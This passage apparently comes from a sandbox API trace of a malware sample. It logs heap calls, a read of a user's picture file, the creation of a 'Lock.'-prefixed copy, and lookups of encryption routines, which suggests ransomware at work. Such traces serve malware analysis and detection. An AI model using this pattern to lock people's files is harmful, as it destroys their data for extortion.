hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0247.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0247.492] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0247.492] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0247.492] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0247.492] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0247.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/abBnrhJwU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\abbnrhjwu.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0247.493] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.493] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0247.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0247.493] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0247.493] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0247.493] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0247.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0247.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0247.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.494] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0247.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0247.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0247.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0247.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0247.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0247.495] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.abBnrhJwU.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.abbnrhjwu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0247.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0247.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0247.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0247.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0247.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0247.500] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0247.500] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0247.503] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x7863, lpOverlapped=0x0) returned 1 [0247.504] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0247.510] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0247.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0247.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17863) returned 0x2f14010 [0247.510] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0247.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0247.511] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0247.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0247.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0247.511] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0247.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0247.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0247.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0247.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0247.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0247.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.515] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0247.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.515] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.515] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0247.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.515] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0247.516] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.516] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.516] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 